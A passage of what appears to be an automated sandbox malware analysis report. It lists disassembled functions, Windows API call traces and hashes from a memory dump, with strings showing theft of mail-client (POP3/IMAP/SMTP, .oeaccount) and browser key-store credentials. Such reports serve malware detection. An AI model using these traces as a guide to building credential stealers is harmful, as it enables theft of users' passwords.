                                                                                                                                                                                                                    • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                                                    • API String ID: 524865279-2190619648
                                                                                                                                                                                                                    • Opcode ID: bb8a79189eebe21ea9a309b84d13f13660712c6c97ce44d04bc2eb4e66ed4208
                                                                                                                                                                                                                    • Instruction ID: 2c282e6ff88bd57be97cdb9cd65414afbc0c2375aa853475002addcb7488d922
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb8a79189eebe21ea9a309b84d13f13660712c6c97ce44d04bc2eb4e66ed4208
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75316075A4025DAFDB11EB69CC81AEEBBBCEF45314F0080B6FA04A3141D6789F498F65
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00409123 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                                                    • API String ID: 2300387033-3849865405
                                                                                                                                                                                                                    • Opcode ID: 99e79691bf6533de20a974ac65a5fcf95ef7575eddab1868be2d8be4df739519
                                                                                                                                                                                                                    • Instruction ID: 102fedc8b068d714547c44678b24ea6bae60c59159463c21af6927f9d555436f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99e79691bf6533de20a974ac65a5fcf95ef7575eddab1868be2d8be4df739519
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8210F71108380AFE7108F61D889A5FB7E8FB85344F04093FF684A6282E779DD048B5A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00407446 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                                                    • String ID: %s (%s)
                                                                                                                                                                                                                    • API String ID: 3756086014-1363028141
                                                                                                                                                                                                                    • Opcode ID: 4357e9335d32c2bf08e92843452a3ff925627b6c59b5d6ec26037838f45d6104
                                                                                                                                                                                                                    • Instruction ID: 49fd0969a141bf365c85b2e85b726abfc67c7a4f8a3ab277a670c68284d415ec
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4357e9335d32c2bf08e92843452a3ff925627b6c59b5d6ec26037838f45d6104
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A1193B1800118AFEB21DF59CD45F99B7ACEF41308F008466FA48EB106D275AB15CB95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00443683 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,.8D,00443752,?,?,*.oeaccount,.8D,?,00000104), ref: 0044369D
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004436AF
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004436BE
                                                                                                                                                                                                                      • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                                                      • Part of subcall function 00443546: wcslen.MSVCRT ref: 00443559
                                                                                                                                                                                                                      • Part of subcall function 00443546: ??2@YAPAXI@Z.MSVCRT ref: 00443562
                                                                                                                                                                                                                      • Part of subcall function 00443546: WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
                                                                                                                                                                                                                      • Part of subcall function 00443546: strlen.MSVCRT ref: 004435BE
                                                                                                                                                                                                                      • Part of subcall function 00443546: memcpy.MSVCRT ref: 004435D8
                                                                                                                                                                                                                      • Part of subcall function 00443546: ??3@YAXPAX@Z.MSVCRT ref: 0044366B
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004436E9
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004436F3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                                                    • String ID: .8D
                                                                                                                                                                                                                    • API String ID: 1886237854-2881260426
                                                                                                                                                                                                                    • Opcode ID: e9accfc59e3ea295214b65d31af1a641a7a6f9c6ce4573a7963a3bdc594cfe72
                                                                                                                                                                                                                    • Instruction ID: b4a99ca98ea4b9fd05b978b53b3f03ecc28babd8507da3569ede40c7aa85cfb3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9accfc59e3ea295214b65d31af1a641a7a6f9c6ce4573a7963a3bdc594cfe72
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42012432804248BFEB206F75EC4ED9FBB6CEF46364B10812BF81487261DA358D14CA28
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00408F32 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408F5D
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00408F72
                                                                                                                                                                                                                      • Part of subcall function 0040900D: memset.MSVCRT ref: 00409031
                                                                                                                                                                                                                      • Part of subcall function 0040900D: GetPrivateProfileStringA.KERNEL32(00451308,0000000A,0044551F,?,00001000,00451200), ref: 00409053
                                                                                                                                                                                                                      • Part of subcall function 0040900D: _mbscpy.MSVCRT ref: 0040906D
                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00408F99
                                                                                                                                                                                                                    • EnumChildWindows.USER32(?,Function_00008ED5,00000000), ref: 00408FA9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                                                                                    • String ID: caption$dialog_%d
                                                                                                                                                                                                                    • API String ID: 2923679083-4161923789
                                                                                                                                                                                                                    • Opcode ID: 000f1f906e92f5b03bb8d936c1600f8ee9725489ffd6e52dafee9c1c18951f52
                                                                                                                                                                                                                    • Instruction ID: 5193b431d0dc7ecedf7a364b2ddef3fe6b5aec68a3d00ff581056cac6fb231a4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 000f1f906e92f5b03bb8d936c1600f8ee9725489ffd6e52dafee9c1c18951f52
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67F0BB745043487FFB129BA0DD06FC97AA8AB08747F0000A6BB44F11E2DBF899908B5E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00441E91 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00441F4B
                                                                                                                                                                                                                      • Part of subcall function 00441A6C: memcmp.MSVCRT ref: 00441AB5
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmpmemcpy
                                                                                                                                                                                                                    • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                                                                    • API String ID: 1784268899-4153596280
                                                                                                                                                                                                                    • Opcode ID: 6b6b8ae9c0e91365de8150e640e5bb5f4ec7e5282d2e56bc441d5ca3420a582e
                                                                                                                                                                                                                    • Instruction ID: db602eaa8e833254b0c0c9be43f42c24c685b457dfa8f14c56b0ec28138b2128
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b6b8ae9c0e91365de8150e640e5bb5f4ec7e5282d2e56bc441d5ca3420a582e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5091E2B1900700AFE730AF25C981A9EBBE5AB44304F14492FF14697392C7B9A985CB59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040FB27 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040F7DE,00000000,?), ref: 0040FB5E
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FBBB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FBCD
                                                                                                                                                                                                                      • Part of subcall function 0040FA44: _mbscpy.MSVCRT ref: 0040FA6A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FCB4
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040FCD9
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,0040F7DE,?), ref: 0040FD23
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3974772901-0
                                                                                                                                                                                                                    • Opcode ID: 4ad987a4bc41c02407afd48bd51c39f8f43132cb09b5aa7545cf57ad8340978a
                                                                                                                                                                                                                    • Instruction ID: 4cd0dab2c11de29b1205cc267bdcfe4bbed2ca853fb67bca61950d18440e6937
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ad987a4bc41c02407afd48bd51c39f8f43132cb09b5aa7545cf57ad8340978a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79511EB590021CABDB60DF95DD85ADEBBB8FF44305F1000BAE609A2281D7759E84CF69
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00443546 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 00443559
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00443562
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
                                                                                                                                                                                                                      • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 0044288D
                                                                                                                                                                                                                      • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428AB
                                                                                                                                                                                                                      • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428C6
                                                                                                                                                                                                                      • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428EF
                                                                                                                                                                                                                      • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 00442913
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004435BE
                                                                                                                                                                                                                      • Part of subcall function 004429E9: ??3@YAXPAX@Z.MSVCRT ref: 004429F4
                                                                                                                                                                                                                      • Part of subcall function 004429E9: ??2@YAPAXI@Z.MSVCRT ref: 00442A03
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004435D8
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0044366B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 577244452-0
                                                                                                                                                                                                                    • Opcode ID: 4370cab8d1ed043324ede4dc3b9a4d06d61cdd8212607e5f6e8765e25bb93f57
                                                                                                                                                                                                                    • Instruction ID: ed198900897cbedb477538fc3de06edee324e7a25cf08c3aedaf46951cf6a217
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4370cab8d1ed043324ede4dc3b9a4d06d61cdd8212607e5f6e8765e25bb93f57
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14318672804219AFEF21EF65C8819DEBBB5EF45314F5480AAF108A3200CB396F84DF49
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00404469 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                                                      • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 004044FA
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                                                    • String ID: imap$pop3$smtp
                                                                                                                                                                                                                    • API String ID: 2025310588-821077329
                                                                                                                                                                                                                    • Opcode ID: 4172489bfdd0b02c38134a290eb16c247b5a863f83d9230e12e3431aa9a1b902
                                                                                                                                                                                                                    • Instruction ID: ee17be80c36da3591ff53c386c7625c128025028662cc5e87d89578f4f8b6d75
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4172489bfdd0b02c38134a290eb16c247b5a863f83d9230e12e3431aa9a1b902
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C42196B25046189BEB51DB15CD417DAB3FCEF90304F10006BE79AB7181DB787B498B59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040BD68 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BD88
                                                                                                                                                                                                                      • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                                      • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                                      • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                                      • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                                      • Part of subcall function 00407446: memset.MSVCRT ref: 00407466
                                                                                                                                                                                                                      • Part of subcall function 00407446: sprintf.MSVCRT ref: 00407493
                                                                                                                                                                                                                      • Part of subcall function 00407446: strlen.MSVCRT ref: 0040749F
                                                                                                                                                                                                                      • Part of subcall function 00407446: memcpy.MSVCRT ref: 004074B4
                                                                                                                                                                                                                      • Part of subcall function 00407446: strlen.MSVCRT ref: 004074C2
                                                                                                                                                                                                                      • Part of subcall function 00407446: memcpy.MSVCRT ref: 004074D2
                                                                                                                                                                                                                      • Part of subcall function 00407279: _mbscpy.MSVCRT ref: 004072DF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                    • API String ID: 2726666094-3614832568
                                                                                                                                                                                                                    • Opcode ID: dc175560a6198b9798b44ce5f971e01ac777fcc381b56c1877e1d198c2103063
                                                                                                                                                                                                                    • Instruction ID: 9cc38d581f61d2a6594629c27ef9ad5a8c62d4d42b688fbaa09f609bba3e4d8d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc175560a6198b9798b44ce5f971e01ac777fcc381b56c1877e1d198c2103063
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0121FBB1C002599ADB40EFA5D981BDDBBB4AB08308F10517EF548B6281DB382A45CB9E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00403A53 Relevance: 9.1, APIs: 6, Instructions: 56filestringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403A78
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403A91
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AA8
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AC7
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00403AD9
                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AEA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1786725549-0
                                                                                                                                                                                                                    • Opcode ID: e58b70ba74cd0776df0cd714b6ebe3d4fb4c03e2cd7b5e97725e455eaa9c95ba
                                                                                                                                                                                                                    • Instruction ID: 3c11530c7ff43e2cab0ee1a3c4b7d34204fc8064c5823527b9b114d7af9e1f20
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e58b70ba74cd0776df0cd714b6ebe3d4fb4c03e2cd7b5e97725e455eaa9c95ba
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50112DBA80412CBFFB10AB94DC85EEBB3ADEF09355F0001A6B715D2092D6359F548B78
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040BE9E Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040BEB8
                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040BECA
                                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,00446634,00000000,?), ref: 0040BEEC
                                                                                                                                                                                                                    • OpenClipboard.USER32(?), ref: 0040BF0C
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040BF25
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040BF42
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2014771361-0
                                                                                                                                                                                                                    • Opcode ID: f1e64fb6be10128bbee6f3e595a742589036f7cac5447e39c680a47d04657e65
                                                                                                                                                                                                                    • Instruction ID: 907fbb9bc954c15d9eb0ad6f98a85717611d4d669dd49ad048df0fde8b6b2f4b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1e64fb6be10128bbee6f3e595a742589036f7cac5447e39c680a47d04657e65
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B11A1B6900218ABDF20AB61DC49FDB77BCAB11701F0000B6B685E2092DBB499C48F68
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406113 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00406129
                                                                                                                                                                                                                      • Part of subcall function 00406057: memcmp.MSVCRT ref: 00406075
                                                                                                                                                                                                                      • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060A4
                                                                                                                                                                                                                      • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060B9
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00406154
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040617C
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00406199
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                                                    • String ID: global-salt$password-check
                                                                                                                                                                                                                    • API String ID: 231171946-3927197501
                                                                                                                                                                                                                    • Opcode ID: e64782263ff5605526e0fe757cea6ed3191f710ccf3b0afa5e67e353afe61262
                                                                                                                                                                                                                    • Instruction ID: 655c6eb068c7835b63414ef3c9938ae25085d91347c247b77763f6b5778615a8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e64782263ff5605526e0fe757cea6ed3191f710ccf3b0afa5e67e353afe61262
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E301D8B954070466FF202A628C42B8B37585F51758F024137FD067D2D3E37E87748A4E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00442960 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    • Opcode ID: 61b661c510ad4b0743117b2440ebaa6c68aec67bf7d0c3759525eee1844cf9ab
                                                                                                                                                                                                                    • Instruction ID: 5b630ca211e00ee6ab232d4f5fe81ba50f7f923f282134244f429d4b925a3085
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61b661c510ad4b0743117b2440ebaa6c68aec67bf7d0c3759525eee1844cf9ab
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7501A272E0AD31A7E1257A76554135BE3686F04B29F05024FB904772428B6C7C5445DE
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00401693 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004016A2
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 004016B0
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000014), ref: 004016BC
                                                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 004016D6
                                                                                                                                                                                                                    • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E5
                                                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 004016F2
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 19018683-0
                                                                                                                                                                                                                    • Opcode ID: d93d450dc478f7866c229f4a037813e0caab4cabbf567c971482d52d831a5164
                                                                                                                                                                                                                    • Instruction ID: 724a62348f30ed3062fc78c586e299175c66965872e24402369681ac2eeab922
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d93d450dc478f7866c229f4a037813e0caab4cabbf567c971482d52d831a5164
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0701FB76900619AFDF04DFA8DC499FE7BBDFB45301F00046AEA11AB295DAB1A914CF90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040C319 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 0040C352
                                                                                                                                                                                                                    • SetFocus.USER32(?,?,?), ref: 0040C3F8
                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 0040C4F5
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
